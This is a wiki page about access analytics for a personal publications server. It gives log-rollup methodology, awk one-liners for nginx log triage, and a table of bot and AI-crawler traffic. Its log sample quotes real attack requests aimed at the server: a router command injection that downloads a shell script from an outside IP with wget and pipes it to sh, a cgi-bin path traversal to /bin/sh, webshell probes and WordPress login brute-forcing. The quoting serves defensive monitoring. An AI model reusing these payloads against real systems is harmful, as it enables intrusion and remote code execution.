Publications Access Graphs

metadata (Normative)

| Title: | Publications Access Graphs |
|---|---|
| Author: | Ralph B. Holland |
| version: | 1.11.0 |
| Publication Date: | 2026-01-30T01:55Z |
| Updates: | |
| Affiliation: | Arising Technology Systems Pty Ltd |
| Contact: | ralph.b.holland [at] gmail.com |
| Provenance: | This is a curation artefact |
| Status: | temporal ongoing updates expected |

The metadata table immediately preceding is CM-defined and constitutes the authoritative provenance record for this artefact.

All fields in that table (including artefact, author, version, date and reason) MUST be treated as normative metadata.

The assisting system MUST NOT infer, normalise, reinterpret, duplicate, or rewrite these fields. If any field is missing, unclear, or later superseded, the change MUST be made explicitly by the human and recorded via version update, not inferred.

As curator and author, I apply the Apache License, Version 2.0, at publication to permit reuse and implementation while preventing enclosure or patent capture. This licensing action does not revise, reinterpret, or supersede any normative content herein.

Authority remains explicitly human; no implementation, system, or platform may assert epistemic authority by virtue of this license. (2025-12-18 version 1.0 - See the Main Page)

Publications access graphs

Scope

















This is a collection of normatives and projections used to evaluate page interest and efficacy. The corpus is maintained as a corrigible set of publications. It includes lead-in and foundational works, and these lead-ins are easy to see in the projections. A great number of hits come from AI bots and web crawlers (only those I permit). Those accesses have overwhelmed the MediaWiki page hit counters, so these projections filter out that noise.

I felt that users of the corpus may find these projections an honest way of looking at live corpus page landings and updates (outside of Zenodo views and downloads). All public publications on the MediaWiki may be viewed via category:public.

Sometimes the curator will want all nginx virtual servers and will supply a rollups.tgz for the whole web farm. At other times they will supply a rollup that is already filtered to publications.arising.com.au. The model is NOT required to perform virtual-server filtering.
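A curator may want to pre-filter raw logs to one virtual server before rolling them up. The following is a minimal sketch of one way to do that. It assumes that the farm's nginx log_format ends with a quoted virtual-host field, so that splitting on double quotes places the host in `$8`; the Tooling one-liners on this page imply this layout. The function name `filter_vhost` is hypothetical and is not part of logrollup.

```bash
#!/usr/bin/env bash
# Hypothetical helper: keep only access-log lines for one nginx virtual server.
# ASSUMPTION: splitting each line on double quotes puts the virtual host in $8
# (true for nginx "combined" format plus a trailing quoted "$host" field).
filter_vhost() {
  local vhost="$1"
  shift
  # Reads the named files, or stdin when no files are given.
  awk -F'"' -v host="$vhost" '$8 == host' "$@"
}

# Example (file names are illustrative):
#   filter_vhost publications.arising.com.au access.log > publications.access.log
```

If the log_format differs, only the field number in the awk test needs to change.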

Projections





Rollup capture starts from 2025-12-23.

Projections include:











- page access lifetime graphlets











- page total accumulated hits by access category: human_get, metadata, ai, bot and bad-bot (new 2026-01-03)





- accumulated human_get time series

- page_category scatter plot

Appendix A contains one set of general invariants used for projections, followed by invariants for specific projections, notably:

- Corpus membership constraints apply ONLY to the accumulated human_get time series.

- The daily hits scatter is NOT restricted to corpus titles.

- Main_Page is excluded from the accumulated human_get projection but not from the scatter plot; this is intentional.
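The membership invariants above can be expressed as a small shell check. This is a minimal sketch that assumes corpus membership is supplied as a file of page titles, one per line. The file, the function name `projections_for` and the page titles are hypothetical illustrations, not the Appendix A definitions.

```bash
#!/usr/bin/env bash
# Hypothetical helper encoding the projection-membership invariants above.
# ASSUMPTION: corpus membership is a file of page titles, one per line.
projections_for() {
  local title="$1" corpus_file="$2"
  # The daily hits scatter is NOT restricted to corpus titles and keeps Main_Page.
  local result="scatter"
  # The accumulated human_get time series takes corpus titles only, minus Main_Page.
  if [ "$title" != "Main_Page" ] && grep -Fxq -- "$title" "$corpus_file"; then
    result="$result time_series"
  fi
  printf '%s\n' "$result"
}

# Example with a throwaway corpus list (titles are placeholders):
corpus=$(mktemp)
printf '%s\n' Main_Page Example_Paper > "$corpus"
projections_for Main_Page "$corpus"       # scatter
projections_for Example_Paper "$corpus"   # scatter time_series
projections_for Outside_Page "$corpus"    # scatter
rm -f "$corpus"
```

In this sketch, Main_Page is rejected before the corpus lookup. It therefore stays out of the time series even if it appears in the corpus list.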

The projection data were acquired by running logrollup over the nginx access logs.

The logrollup program is in Appendix B - logrollup. It now contains a metadata bucket for anon/metadata access, which is by far the predominant corpus traffic (bots masquerading as web browsers).

Appendix C provides the Access Lifetime invariants.

Appendix D - page_list-verify produces an aggregation used to verify the scatter plot and time series. With the additional categories included, it is also quite an insightful projection in its own right.

An access is assumed to be human-centric when the agent cannot be identified and the access is a real page access rather than a metadata access. Identified robots and AI agents are relegated to non-human categories. The Bad Bot category covers any bot purposefully excluded from the web-server farm by nginx filtering. The human category also contains unidentified agents, because there is no definitive way to know that any access is really human. The rollups were verified against temporal nginx log analysis, and the bot/human characterisation is fairly indicative. Metadata access is assumed to come from an agent, since humans do not normally crawl through metadata links.
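The classification order described above can be sketched as a small shell function. This is not the logrollup code in Appendix B. The AI agent list, the `BAD_BOT_RE` variable, the MediaWiki metadata URL patterns and the helper names `matches` and `classify_access` are all assumptions for illustration.

```bash
#!/usr/bin/env bash
# Illustrative classifier following the ordering described above.
# NOT the Appendix B logrollup code: every pattern here is an ASSUMPTION.

# True when string $1 matches extended regex $2.
matches() { printf '%s\n' "$1" | grep -Eq -- "$2"; }

#   $1 = user agent   $2 = HTTP method   $3 = request path
classify_access() {
  local ua="$1" method="$2" path="$3"
  # Hypothetical placeholder for agents the nginx rules deliberately exclude.
  local bad_bot_re="${BAD_BOT_RE:-ExampleBadBot}"
  # AI agents that appear in this page's summary table.
  local ai_re='GPTBot|ChatGPT-User|OAI-SearchBot|ClaudeBot|PerplexityBot'
  # Any other self-identified robot.
  local bot_re='[Bb]ot|[Cc]rawler|[Ss]pider'
  # Hypothetical MediaWiki metadata links (history, diffs, page info, specials).
  local meta_re='action=(history|info|raw)|oldid=|diff=|Special:'

  if matches "$ua" "$bad_bot_re"; then
    echo "bad-bot"
  elif matches "$ua" "$ai_re"; then
    echo "ai"
  elif matches "$ua" "$bot_re"; then
    echo "bot"
  elif matches "$path" "$meta_re"; then
    echo "metadata"    # unidentified agent crawling metadata links
  elif [ "$method" = "GET" ]; then
    echo "human_get"   # unidentified agent, real page access
  else
    echo "other"
  fi
}
```

The ordering matters. An agent string such as ChatGPT-User also contains "bot" in its URL, so the AI test must run before the generic robot test.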

The accumulated page time series counts from 2025-12-25 and is filtered to pages in the Corpus. The scatter plot, by contrast, aggregates across the entire period and is categorised by agent, method and status code. It excludes only noise-type access, so it includes every publication that may be of interest (even those outside the corpus).
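A running per-page total starting at 2025-12-25 can be sketched with awk. The input format here is a hypothetical intermediate, not the rollup file format: whitespace-separated `YYYY-MM-DD page_title human_get_count` lines sorted by date, with MediaWiki-style underscore titles containing no spaces. The function name `accumulate_human_get` is illustrative.

```bash
#!/usr/bin/env bash
# Sketch of an accumulated per-page human_get series.
# ASSUMPTION: input lines are "YYYY-MM-DD page_title human_get_count",
# sorted by date. ISO dates compare correctly as plain strings in awk.
accumulate_human_get() {
  local start="${1:-2025-12-25}"
  awk -v start="$start" '
    $1 >= start {
      total[$2] += $3            # running total per page
      print $1, $2, total[$2]
    }'
}

# Example:
#   printf '%s\n' '2025-12-24 Paper_A 5' '2025-12-25 Paper_A 2' '2025-12-26 Paper_A 3' |
#     accumulate_human_get
#   prints:
#     2025-12-25 Paper_A 2
#     2025-12-26 Paper_A 5
```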

I introduced the deterministic page_list_verify and the extra human_get bar graph for each page as a verification step. The model evidently has projection difficulties and seems unable to follow the normative projection sections. I have tried many ways to reconcile its output, and I can now normatively assert the upper bounds using the latest deterministic code.

Revised Projections

2026-06-12

2026-06-10

2026-06-09

metadata accessors

There are many automated systems scraping the web.

```
ralph@padme:~/AI$ ./sample nginx-logs.tgz
```

Tooling

I have weird agents attacking my farm. The following awk one-liners are useful for seeing the top 50 host | request (| agent) combinations.

- to find attacks across the farm (requests with an empty or "-" user agent)

```bash
awk -F\" '$6=="-" || $6=="" {print $8 " | " $2 " | " $6}' access.log | sort | uniq -c | sort -nr | head -50
```

- loading PDF

```bash
awk -F\" '$2 ~ /\.pdf/ {print $8 " | " $2 " | " $6}' access.log | sort | uniq -c | sort -nr | head -50
```

- check site wide

```bash
awk -F\" '$6=="-" || $6=="" {print $8 " | " $2}' access.log | sort | uniq -c | sort -nr | head -50
```
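The one-liners above rely on how `awk -F\"` splits a log line. The following sketch illustrates that split. It assumes the farm's log_format is nginx "combined" plus a trailing quoted `$host`, which is inferred from the outputs on this page, where `$8` prints the host. The sample line is synthetic and `log_field` is a hypothetical helper.

```bash
#!/usr/bin/env bash
# Print field N of each input line, splitting on double quotes as the
# one-liners above do.
log_field() {
  awk -F'"' -v n="$1" '{ print $n }'
}

# Synthetic line (ASSUMED format: combined + trailing "$host").
sample='203.0.113.7 - - [12/Mar/2026:10:00:00 +1100] "GET /pub/Example HTTP/2.0" 200 5120 "-" "curl/7.88.1" "publications.arising.com.au"'

for n in 2 6 8; do
  # $2 = request line, $6 = user agent, $8 = virtual host
  printf '$%s = %s\n' "$n" "$(printf '%s\n' "$sample" | log_field "$n")"
done
# prints:
#   $2 = GET /pub/Example HTTP/2.0
#   $6 = curl/7.88.1
#   $8 = publications.arising.com.au
```

The odd-numbered fields hold the unquoted parts of the line: the client address and timestamp in `$1`, and the status and byte count in `$3`.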

This is a sample of the types of attack seen:

```
awk -F\" '$6=="-" || $6=="" {print $8 " | " $2}' access.log | sort | uniq -c | sort -nr | head -50

178 xxx.com.au | GET / HTTP/1.1
178 xxx.com.au | GET /wiki/Main_Page HTTP/1.1
178 xxx.com.au | GET / HTTP/1.1
153 xxx.com.au | GET /family/Reverend_Bruce_Holland_tribute HTTP/1.1
10 xxx.com.au | GET / HTTP/1.1
4 xxx.com.au | PROPFIND / HTTP/1.1
4 xxx.com.au | GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.1
2 xxx.com.au | POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1
2 xxx.com.au | GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//144.172.103.95/router.tplink.sh%20-O-%7Csh) HTTP/1.1
2 xxx.com.au | GET /wp9.php HTTP/1.1
2 xxx.com.au | GET /path.php HTTP/1.1
2 xxx.com.au | GET /ms-edit.php HTTP/1.1
1 xxx.com.au | GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.1
1 xxx.com.au | \x00\x0E8\xDA\xF2\x00\xD4q\x9E<U\x00\x00\x00\x00\x00
1 xxx.com.au | \x00\x0E8\x01\x01\x01\x01\x01\x01\x01\x01\x00\x00\x00\x00\x00
1 xxx.com.au | \x00\x07\x06\x1A\x1A\x03\x04\x03\x03\x00\x12\x00\x00\x00\x10\x00\x0E\x00\x0C\x02h2\x08http/1.1\x00\x1B\x00\x03\x02\x00\x02\x00\x17\x00\x00\xFE
1 xxx.com.au | SSTP_DUPLEX_POST /sra_{BA195980-CD49-458b-9E23-C84EE0ADCD75}/ HTTP/1.1
1 xxx.com.au | MGLNDD_203.217.61.13_443
1 xxx.com.au | 'GET / HTTP/1.1
1 xxx.com.au | \x16\x03\x02\x01o\x01\x00\x01k\x03\x02RH\xC5\x1A#\xF7:N\xDF\xE2\xB4\x82/\xFF\x09T\x9F\xA7\xC4y\xB0h\xC6\x13\x8C\xA4\x1C=\x22\xE1\x1A\x98 \x84\xB4,\x85\xAFn\xE3Y\xBBbhl\xFF(=':\xA9\x82\xD9o\xC8\xA2\xD7\x93\x98\xB4\xEF\x80\xE5\xB9\x90\x00(\xC0
1 xxx.com.au | \x16\x03\x01\x00\xF2\x01\x00\x00\xEE\x03\x03\xDE\x11Qk[KpN\x9E\xBD\x98I[\xF8\x7F\xA9\xFC{\xD8\xB6\xBE\x0C\x9A4ptu\xCC\xF2\x88!7 T\x7F\x9Aw\xFAeT\x1B#\xA3?\xCA\xFEoqGM\xC9V5\xA1\xF1\xAD\xB7\xF5\xDD\xB7\x22\xF7k
1 xxx.com.au | \x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x03\xBE)\xDFj\xAD\xC5\x0B\xD0\xB9\x88L\xAB\xD0\x0F\x22\xBC\x0C5\x94\xDB\xCAZ\x8A\xF2}t/\xAB\x9D\xB1\x836 \xC4\xAA\xF4\x1B\xD5\xF7<\xFB\xDDO\xCA\xF3\xB6\x91\xC7R\xB6Fh\xCE]\xD1\x90`\xA7\x19\xD9\x00\xD9\x8F\xBA\xE5\x00&\xC0+\xC0/\xC0,\xC00\xCC\xA9\xCC\xA8\xC0\x09\xC0\x13\xC0
1 xxx.com.au | \x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x03\x80,\x1C\xF0\xEA\xE7\xF3W\xBD\x7F7\xDEp\xAC\xFCPHZ\x14\xCB^!\x06\x1A\xF9m/r1V\x86\x94 ;\x058\xC6\xF7\x84\xA5\xC5\x9C
1 xxx.com.au | \x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x03\x12z\xDF\x86\xB1\xE9\xE7\x02?/e\xB4x-\x1ES\xF2A\xD6\x22\x94\xB7\x96\x7F-\xC8\xE2\xA3\xC0\xD9\x00\x86 <\xF8\xD9\xCCM%\xFA@\xEE\xD6\x8D~\xD8A^\x88\x0B\x06&a:\x16)\x08\xC43\x9A\xDE\xA7\x8Ct)\x00&\xCC\xA8\xCC\xA9\xC0/\xC00\xC0+\xC0,\xC0\x13\xC0\x09\xC0\x14\xC0
1 xxx.com.au | \x16\x03\x01\x00\xCA\x01\x00\x00\xC6\x03\x03[\xB4i\xAA/\x18}\x11\xD1\xE0\x94U\xB4\xE7\xC5:QI\x97\xC8\xE9/y)\x87\xC4\xDA\xAF>\x0F\xC1\xF0\x00\x00h\xCC\x14\xCC\x13\xC0/\xC0+\xC00\xC0,\xC0\x11\xC0\x07\xC0'\xC0#\xC0\x13\xC0\x09\xC0(\xC0$\xC0\x14\xC0
1 xxx.com.au | \x16\x03\x01\x00\x8B\x01\x00\x00\x87\x03\x03'7\xE9\xB27p\x06\x96\xEA\xC6\xE3\xCC
1 xxx.com.au | \x03\x00\x00/*\xE0\x00\x00\x00\x00\x00Cookie: mstshash=Administr
1 xxx.com.au | \x00\x0E8\x95z\xAA\x1C\xB2+\xF4Z\x00\x00\x00\x00\x00
1 xxx.com.au | t3 12.1.2
```
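Several lines in that sample are not HTTP at all. Lines beginning `\x16\x03` look like TLS handshake records sent to a plain-HTTP listener, and `Cookie: mstshash=` is the signature of an RDP connection request. The following sketch totals such `count host | request` lines by rough probe type. The category names and patterns are illustrative assumptions rather than a complete taxonomy, and `bucket_probes` is a hypothetical helper.

```bash
#!/usr/bin/env bash
# Sketch: total "count host | request" lines by rough probe type.
# The categories and patterns are illustrative ASSUMPTIONS, not a taxonomy.
bucket_probes() {
  awk -F' *[|] *' '
    {
      n = $1 + 0                     # leading uniq -c count
      req = $2
      if (req ~ /^\\x16\\x03/)        type = "tls-handshake-on-http"
      else if (req ~ /mstshash=/)     type = "rdp-probe"
      else if (req ~ /%2e/)           type = "path-traversal"
      else if (req ~ /wget|curl/)     type = "command-injection"
      else if (req ~ /\.php/)         type = "php-probe"
      else                            type = "other"
      sum[type] += n
    }
    END { for (t in sum) print sum[t], t }' | sort -nr
}

# Example: feed it the output of the "check site wide" one-liner.
#   awk -F\" '$6=="-" || $6=="" {print $8 " | " $2}' access.log |
#     sort | uniq -c | bucket_probes
```

The field separator tolerates missing spaces around the `|`. The `\\x16` in the awk regex matches the literal backslash escape that nginx writes into the log, not a raw byte.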

- general top access

```
root@padme:/var/log/nginx# awk -F\" '{print $8 " | " $2 " | " $6}' access.log | sort | uniq -c | sort -nr | head -50

956 f.com.au | HEAD / HTTP/1.1 | curl/7.88.1
956 c.com.au | HEAD / HTTP/1.1 | curl/7.88.1
956 w.com.au | HEAD / HTTP/1.1 | curl/7.88.1
190 y.com.au | HEAD / HTTP/1.1 | curl/7.81.0
178 w.com.au | GET / HTTP/1.1 | -
178 ww.com.au | GET /wiki/Main_Page HTTP/1.1 | -
178 ww.com.au | GET / HTTP/1.1 | -
153 f.com.au | GET /family/Reverend_Bruce_Holland_tribute HTTP/1.1 | -
56 p.com.au | POST /pub-dir/api.php HTTP/2.0 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
56 c.com.au | POST /update/picture.cgi HTTP/2.0 | Mozilla/5.0 zgrab/0.x
50 pad.au | POST /wp-login.php HTTP/1.1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Safari/605.1.15
48 r.org | GET /rt/Training_Outreach HTTP/2.0 | Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko); compatible; ChatGPT-User/1.0; +https://openai.com/bot
48 r.org | GET / HTTP/2.0 | Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko); compatible; ChatGPT-User/1.0; +https://openai.com/bot
46 r.org | GET /favicon.ico HTTP/2.0 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
40 pad.au | POST /wp-login.php HTTP/1.1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Safari/605.1.15
34 pad.au | POST /wp-login.php HTTP/1.1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Safari/605.1.15
32 f.com.au | GET /family/Reverend_Bruce_Holland_tribute HTTP/1.1 | Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.86 Safari/537.36 BitSightBot/1.0
28 pad.com.au | POST /wp-login.php HTTP/1.1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.1.15
26 p.com.au | GET /pub-dir/images/0/03/Part_91_Plain_English_Guide.pdf HTTP/2.0 | Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko); compatible; ChatGPT-User/1.0; +https://openai.com/bot
23 pad.com.au | POST /wp-login.php HTTP/1.1 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
22 w.com.au | GET /favicon.ico HTTP/2.0 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
22 pad.com.au | POST /wp-login.php HTTP/1.1 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
22 pad.com.au | POST /wp-login.php HTTP/1.1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
21 pad.com.au | POST /wp-login.php HTTP/1.1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:120.0) Gecko/20100101 Firefox/120.0
19 pad.com.au | POST /wp-login.php HTTP/1.1 | Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
19 pad.com.au | POST /wp-login.php HTTP/1.1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
19 padme.arising.com.au | POST /wp-login.php HTTP/1.1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
19 pad.com.au | POST /wp-login.php HTTP/1.1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 13_6_1; rv:121.0) Gecko/20100101 Firefox/121.0
19 padme.arising.com.au | POST /wp-login.php HTTP/1.1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 13_6_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
19 pad.com.au | POST /wp-login.php HTTP/1.1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 13_6_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
19 pad.com.au | POST /wp-login.php HTTP/1.1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
18 p.com.au | GET /pub-dir/load.php?lang=en-gb&modules=site.styles&only=styles&skin=vector-2022 HTTP/2.0 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
18 pad.com.au | POST /wp-login.php HTTP/1.1 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
18 pad.com.au | POST /wp-login.php HTTP/1.1 | Mozilla/5.0 (Windows NT 11.0; Win64; x64; rv:119.0) Gecko/20100101 Firefox/119.0
18 pad.com.au | POST /wp-login.php HTTP/1.1 | Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
17 pad.com.au | POST /wp-login.php HTTP/1.1 | Mozilla/5.0 (Windows NT 11.0; Win64; x64; rv:118.0) Gecko/20100101 Firefox/118.0
17 pad.com.au | POST /wp-login.php HTTP/1.1 | Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
17 pad.com.au | POST /wp-login.php HTTP/1.1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:119.0) Gecko/20100101 Firefox/119.0
17 pad.com.au | POST /wp-login.php HTTP/1.1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 13_6_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
17 pad.com.au | POST /wp-login.php HTTP/1.1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:118.0) Gecko/20100101 Firefox/118.0
17 pad.com.au | POST /wp-login.php HTTP/1.1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
16 p.com.au | GET /pub-dir/load.php?lang=en-gb&modules=startup&only=scripts&raw=1&skin=vector-2022 HTTP/2.0 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
16 pad.com.au | POST /wp-login.php HTTP/1.1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 13_6_1; rv:119.0) Gecko/20100101 Firefox/119.0
16 pad.com.au | POST /wp-login.php HTTP/1.1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
15 pad.com.au | POST /wp-login.php HTTP/1.1 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
15 pad.com.au | POST /wp-login.php HTTP/1.1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 13_6_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
14 w.com.au | GET /robots.txt HTTP/1.1 | Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)
14 p.com.au | GET /robots.txt HTTP/2.0 | Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)
14 p.com.au | GET /pub/Publications_Access_Graphs HTTP/2.0 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
14 pad.com.au | POST /wp-login.php HTTP/1.1 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
```
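In that output, the POST /wp-login.php attempts against the same host appear to be spread across many different agent strings. Each row is therefore small even though the combined volume is large. The following sketch counts those attempts per host while ignoring the agent. It makes the same field assumption as the one-liners (request in `$2`, host in `$8`), and `wp_login_attempts` is a hypothetical helper.

```bash
#!/usr/bin/env bash
# Sketch: count POST /wp-login.php attempts per virtual host, ignoring the
# user agent, so rotating agent strings collapse into one total per host.
# ASSUMPTION: splitting on double quotes gives request = $2, host = $8.
wp_login_attempts() {
  awk -F'"' '$2 ~ /^POST \/wp-login\.php / { n[$8]++ }
    END { for (h in n) print n[h], h }' "$@" | sort -nr
}

# Example: wp_login_attempts /var/log/nginx/access.log | head
```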



Summary (Sampled Log Windows with Infrastructure Event)

| Class | 2025-12-27 | 2025-12-28 | 2025-12-30 | 2026-01-03 | 2026-01-10 | 2026-01-22 | 2026-01-30 | 2026-02-04 | 2026-02-11 | 2026-02-20 | 2026-02-28 | 2026-03-03 | 2026-03-04 | 2026-03-05 | 2026-03-06 | 2026-03-07 | 2026-03-08 | 2026-03-09 | 2026-03-10 | 2026-03-11 | 2026-03-12 | 2026-03-13 |

|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|

| Bytes | 797060581 | 1775268742 | 964590593 | 1535680600 | 1196666216 | 1946354694 | 1972512052 | 3889575239 | 1435222777 | 1304762776 | 1113973398 | 605571945 | 1133432762 | 608526905 | 410444255 | 603790891 | 674927635 | 822446879 | 1147557674 | 3230976394 | 4724439305 | 391811411 |

| Total Hits | 17104 | 24709 | 23655 | 25051 | 22652 | 26792 | 20092 | 22713 | 35298 | 21912 | 31625 | 15803 | 27101 | 21095 | 21969 | 18606 | 20393 | 22113 | 23295 | 53543 | 36938 | 6254 |

| Rate MiB/h | 31.7 | 70.5 | 38.3 | 61.0 | 47.6 | 77.3 | 78.4 | 154.6 | 57.0 | 51.8 | 44.3 | 24.1 | 45.0 | 24.2 | 16.3 | 24.0 | 26.8 | 32.7 | 45.6 | 128.4 | 187.7 | 15.6 |

| Average kiB/hit | 45.5 | 70.2 | 39.8 | 59.9 | 51.6 | 70.9 | 95.9 | 167.2 | 39.7 | 58.1 | 34.4 | 37.4 | 40.8 | 28.2 | 18.2 | 31.7 | 32.3 | 36.3 | 48.1 | 58.9 | 124.9 | 61.2 |

| Local Access | 0 | 2232 | 1685 | 1626 | 2259 | 1117 | 2157 | 1695 | 36 | 1670 | 8436 | 2997 | 6659 | 1839 | 1304 | 1930 | 3870 | 5421 | 6545 | 1014 | 820 | 0 |

| Human/Anon/Page | 9510 | 11039 | 9973 | 11277 | 9776 | 11862 | 9201 | 6300 | 9398 | 6452 | 7254 | 3769 | 6076 | 5395 | 5676 | 6264 | 6192 | 5455 | 6047 | 5866 | 5942 | 1372 |

| Anon/Metadata | 1180 | 2690 | 646 | 3144 | 1010 | 1085 | 2232 | 1903 | 3562 | 4465 | 3439 | 2420 | 4603 | 3857 | 4878 | 3881 | 4041 | 3833 | 4742 | 5445 | 4018 | 1489 |

| Other | 4531 | 3929 | 4688 | 6081 | 4678 | 7408 | 3187 | 2688 | 5746 | 6848 | 9791 | 5246 | 7856 | 8050 | 8619 | 4440 | 4934 | 5342 | 4277 | 9208 | 4439 | 1912 |

| Bad Bot | 1391 | 1198 | 6275 | 2055 | 3144 | 709 | 1032 | 1384 | 696 | 748 | 573 | 285 | 522 | 560 | 503 | 462 | 504 | 482 | 487 | 327 | 301 | 32 |

| Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot) | 93 | 3171 | 3 | 8 | 149 | 6 | 109 | 7745 | 14490 | 770 | 163 | 608 | 26 | 65 | 0 | 853 | 54 | 827 | 0 | 39 | 16368 | 1199 |

| meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler) | 2 | 4 | 3 | 7 | 2 | 1 | 2 | 3 | 30 | 11 | 5 | 0 | 34 | 79 | 10 | 9 | 11 | 6 | 2 | 29895 | 3917 | 1 |

| Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) | 0 | 4 | 1 | 0 | 1110 | 738 | 1597 | 295 | 19 | 224 | 1180 | 0 | 752 | 555 | 514 | 282 | 315 | 70 | 659 | 801 | 333 | 82 |

| Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; PerplexityBot/1.0; +https://perplexity.ai/perplexitybot) | 0 | 0 | 0 | 0 | 0 | 3306 | 0 | 1 | 2 | 2 | 4 | 5 | 0 | 0 | 0 | 2 | 0 | 1 | 2 | 82 | 8 | 0 |

| Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36 | 3 | 17 | 19 | 15 | 5 | 152 | 151 | 151 | 168 | 93 | 161 | 77 | 91 | 69 | 64 | 105 | 101 | 96 | 106 | 104 | 139 | 21 |

| Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko); compatible; ChatGPT-User/1.0; +https://openai.com/bot | 44 | 34 | 52 | 55 | 82 | 66 | 70 | 75 | 103 | 53 | 68 | 140 | 128 | 77 | 84 | 73 | 45 | 89 | 111 | 231 | 141 | 31 |

| Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot | 124 | 161 | 123 | 259 | 111 | 76 | 80 | 116 | 330 | 48 | 49 | 30 | 32 | 51 | 20 | 32 | 8 | 28 | 24 | 22 | 59 | 4 |

